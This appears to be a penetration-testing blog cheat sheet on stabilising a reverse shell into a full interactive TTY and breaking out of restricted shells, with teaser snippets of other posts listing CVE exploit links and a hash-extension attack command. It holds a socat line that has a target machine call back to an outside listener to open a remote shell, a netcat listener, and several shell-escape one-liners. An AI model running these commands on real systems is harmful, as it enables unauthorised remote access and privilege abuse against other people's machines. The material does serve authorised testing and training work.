Skip to main content

Get an Interactive Shell - Best


run the payload

nc -nvlp 3333  /after getting the shell 

python -c 'import pty; pty.spawn("/bin/bash")' 

ctrl+Z   /background the process

echo $TERM  /examine the terminal & Copy the output

stty -a   /get number of rows & columns;copy it 


/The information needed is the TERM type ("xterm-256color") and the size of the current TTY ("rows 38; columns 116")


stty raw -echo   

/With the shell still backgrounded, now set the current STTY to type raw and tell it to echo the input characters with the following command

/you wont see any thing just type the next command 

fg   /foreground the nc shell

reset   /reinitialize the terminal with reset.

/Type the Following commands in NC shell

export SHELL=bash
export TERM=xterm256-color
stty rows 38 columns 116


now enjoy auto complete,history,job control

BYPASS RESTRICTED SHELL BY SHELLcartaraz
Using Python for a psuedo terminal
python -c 'import pty; pty.spawn("/bin/bash")'  
Using socat
#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444

#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444  
Using stty options
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

# In Kali
$ stty raw -echo
$ fg

# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
(From within IRB)
exec "/bin/sh" 
(From within vi)
:!bash
(From within vi)
:set shell=/bin/bash:shell 
(From within nmap)
!sh 
sudo /etc/nano filename
^R^X
reset; sh 1>&0 2>&0 

Comments

Popular posts from this blog

POC Links for CVE's

  Serach for a CVE here first - Trickest/cve Apache CVE-2024-38475 - CVE-2024-38475 #version less than 2.4.51 CVE-2021-44790 - h ttps://www.exploit-db.com/exploits/51193 #Apache HTTP Server 2.4.50 CVE-2021-42013 - https://www.exploit-db.com/exploits/50406 use https://github.com/mrmtwoj/apache-vulnerability-testing for below CVE's CVE-2024-38472: Apache HTTP Server on Windows UNC SSRF CVE-2024-39573: mod_rewrite proxy handler substitution CVE-2024-38477: Crash resulting in Denial of Service in mod_proxy CVE-2024-38476: Exploitable backend application output causing internal redirects CVE-2024-38475: mod_rewrite weakness with filesystem path matching CVE-2024-38474: Weakness with encoded question marks in backreferences CVE-2024-38473: mod_proxy proxy encoding problem CVE-2023-38709: HTTP response splitting EXIM #suppodily should work for versions below Exim 4.96.1 - is not accurate CVE-2023-42115 - https://github.com/AdaHop-Cyber-Security/Pocy/tree/main

Hash Extension Attacks

  #Install Dependencies sudo apt-get install libssl-dev #Download Hash Extender git clone https://github.com/iagox86/hash_extender.git cd hash_extender make #Run it /hash_extender --data 'username=admin' --secret 16 --append '&isLoggedIn=True' --signature d3a85d3b3087c7e841f84eb4316765c6e1f786074a1f1db996b2e0f8c96f197e2f55433920a630feb07daafadefbc13c947e5225fc509f8241f57f47a8df5311 --format sha512